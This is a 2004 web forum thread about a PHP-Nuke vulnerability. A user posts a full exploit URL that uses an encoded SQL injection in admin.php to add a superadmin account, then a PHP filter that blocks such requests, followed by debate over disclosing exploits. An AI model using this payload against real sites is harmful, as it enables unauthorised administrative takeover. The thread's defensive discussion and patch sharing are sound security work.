| Author |
Message |
ballymuntrev
Hangin' Around
Joined: Mar 22, 2004
Posts: 49
|
 Posted:
Fri Apr 30, 2004 11:32 am |
 
|
I'm so fecked off with Nuke, every day there's a new exploit or an update to an old exploit 
Here's another one, fairly bad this time.
Raven m8, any chance you can update your HackAttempt script to catch and stop it please dude ?!?
| Code: | http://yoursite.blah/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo bar com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
|
Cheers,
Trev |
|
|
 
|
|
ballymuntrev
Hangin' Around
Joined: Mar 22, 2004
Posts: 49
|
| Posted:
Fri Apr 30, 2004 11:38 am |
|
For anyone else, edit your admin.php file and add the following...
| Code: | if(stristr($_SERVER["QUERY_STRING"],'AddAuthor') || stristr($_SERVER["QUERY_STRING"],'UpdateAuthor')) {
$loc = $_SERVER['QUERY_STRING'];
header("Location: hackattempt.php?$loc");
die();
} |
Thanks Raven for that, and Chatserv for the code too. |
|
|
|
|
|
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
|
| Posted:
Fri Apr 30, 2004 12:01 pm |
|
I dont think its such a good idea to post the actual exploit here if thats what it is.
I tried that exploit on my site and it just returns: Illegal Operation |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Fri Apr 30, 2004 12:08 pm |
|
That exploit is published everywhere already since it is not new. That's common code by now. I understand your caution and I appreciate it, but really, in this case, I can't see it causing any harm. |
|
|
 
|
|
Maku
New Member
Joined: Sep 24, 2003
Posts: 15
Location: Estonia
|
| Posted:
Fri Apr 30, 2004 3:35 pm |
|
You can read about grand new coppermine exploit at here and this one very serious. Right now you can only secue your site when you reaname coppermine directory or delete it. I hope some one found fix soon  |
|
|
 |
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Fri Apr 30, 2004 4:00 pm |
|
Coppermine has a reliable support team I'm sure they'll rewrite and release asap. |
|
|
|
|
|
ladysilver
Hangin' Around
Joined: May 03, 2004
Posts: 49
Location: Cyberspace
|
| Posted:
Mon May 03, 2004 12:28 pm |
|
I don't use Coppermine, but I've had the exploit attempted at one of my sites anyway. I have to wonder about the mentality of somebody who attempts this attack since the attacker's URL is part of the query string. |
|
|
 |
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Mon May 03, 2004 12:40 pm |
|
Hey LS! Good to see you. I really appreciate your 'candor' when posting. |
|
|
|
|
|
ladysilver
Hangin' Around
Joined: May 03, 2004
Posts: 49
Location: Cyberspace
|
| Posted:
Mon May 03, 2004 2:18 pm |
|
Thanks for the good words, Raven. Lol, my goal is 'diplomatic candor', but occasionally I forget.  |
|
|
|
|
|
ballymuntrev
Hangin' Around
Joined: Mar 22, 2004
Posts: 49
|
| Posted:
Thu May 06, 2004 4:41 pm |
|
Sorry if I upset anyone by posting the exploit but I'm always of the thinking that if an exploit is not published then the community cannot fix them quickly. As it turned out it was an oldish exploit (to me though it was new news) and Chatserv had already released a fix for it, thankfully. |
|
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Thu May 06, 2004 5:30 pm |
|
I don't think we can shoot the messenger. Well at least as long as the messengers polite  |
|
|
|
|
|
ballymuntrev
Hangin' Around
Joined: Mar 22, 2004
Posts: 49
|
| Posted:
Thu May 06, 2004 5:39 pm |
|
I'm always polite, even when I've been shot at with real bullets  |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
